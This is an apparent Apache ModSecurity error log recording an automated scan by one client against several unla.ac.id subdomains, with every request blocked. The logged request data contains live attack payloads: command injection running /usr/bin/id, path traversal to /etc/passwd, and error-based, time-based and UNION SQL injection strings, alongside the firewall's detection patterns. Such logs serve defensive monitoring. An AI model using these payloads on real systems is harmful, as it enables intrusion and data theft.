[Tue Aug 29 11:31:13.427576 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAP8GyYAAAAV"]
[Tue Aug 29 11:31:13.427758 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAQUH94AAAA2"]
[Tue Aug 29 11:31:13.463599 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAPMmG8AAAAY"]
[Tue Aug 29 11:31:14.327798 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAN@5DQAAAAO"]
[Tue Aug 29 11:31:14.332007 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAP5mHEAAAAM"]
[Tue Aug 29 11:31:14.333455 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAP4H-QAAAAI"]
[Tue Aug 29 11:31:14.345267 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQMrpAAAAAu"]
[Tue Aug 29 11:31:14.366914 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPPS1cAAAAd"]
[Tue Aug 29 11:31:14.526312 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPMmHIAAAAY"]
[Tue Aug 29 11:31:14.532762 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQJWq8AAAAr"]
[Tue Aug 29 11:31:14.532883 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10ksCo-f0AAAQA-8IAAAAi"]
[Tue Aug 29 11:31:14.549361 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQEGGkAAAAm"]
[Tue Aug 29 11:31:14.549639 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQP65UAAAAx"]
[Tue Aug 29 11:31:14.554229 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQIS7kAAAAq"]
[Tue Aug 29 11:31:15.355472 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10k8Co-f0AAAPahxMAAAAL"]
[Tue Aug 29 11:31:15.362244 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAP8GygAAAAV"]
[Tue Aug 29 11:31:15.368770 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP5mHQAAAAM"]
[Tue Aug 29 11:31:15.421497 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP05KIAAAAA"]
[Tue Aug 29 11:31:15.424591 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10k8Co-f0AAAQSWKcAAAA0"]
[Tue Aug 29 11:31:15.439283 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQQyjQAAAAy"]
[Tue Aug 29 11:31:15.443819 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP5mHUAAAAM"]
[Tue Aug 29 11:31:15.462339 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAQTKGQAAAA1"]
[Tue Aug 29 11:31:16.352970 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lMCo-f0AAAO88AoAAAAF"]
[Tue Aug 29 11:31:16.554015 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQP65gAAAAx"]
[Tue Aug 29 11:31:16.649253 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAQQyjgAAAAy"]
[Tue Aug 29 11:31:16.710795 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAPMmHcAAAAY"]
[Tue Aug 29 11:31:16.757335 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAN@5DcAAAAO"]
[Tue Aug 29 11:31:16.758070 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP05KQAAAAA"]
[Tue Aug 29 11:31:16.758299 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAP8GykAAAAV"]
[Tue Aug 29 11:31:17.320080 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAP@MxMAAAAZ"]
[Tue Aug 29 11:31:17.320272 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQIS70AAAAq"]
[Tue Aug 29 11:31:17.322246 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAPDn5YAAAAP"]
